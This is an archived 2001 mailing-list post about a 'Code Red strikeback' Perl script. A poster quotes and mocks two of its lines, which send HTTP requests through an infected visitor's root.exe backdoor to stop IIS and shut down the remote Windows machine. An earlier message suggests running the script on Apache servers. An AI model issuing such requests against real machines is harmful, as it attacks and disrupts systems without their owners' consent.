[Gllug] Code Red Strikeback
Tom Gilbert
tom at linuxbrit.co.uk
Sat Aug 11 10:43:54 UTC 2001
* Martin Ling (martin at pkl.net) wrote:
> If you haven't seen it on NTK already;
>
> http://www.dasbistro.com/default.ida
>
> Download the script and put it on your Apache servers.
This script is a little shortsighted, no?
I quote:
my $iis_stop_req = new HTTP::Request (GET => "http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+iisreset+/stop");
Okay, that stops the webserver. Then:
print "Appears we have shut down IIS...<br>";
my $server_stop_req = new HTTP::Request (GET => "http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5");
Um.... So we stopped the webserver, and we know we have because we even
tested the result of the attempt to. An yet he is trying to use the
webserver to shutdown the machine. Hehehe.
Tom.
--
.^. .-------------------------------------------------------.
/V\ | Tom Gilbert, London, England | http://linuxbrit.co.uk |
/( )\ | Open Source/UNIX consultant | tom at linuxbrit.co.uk |
^^-^^ `-------------------------------------------------------'
--
Gllug mailing list - Gllug at linux.co.uk
http://list.ftech.net/mailman/listinfo/gllug
More information about the GLLUG
mailing list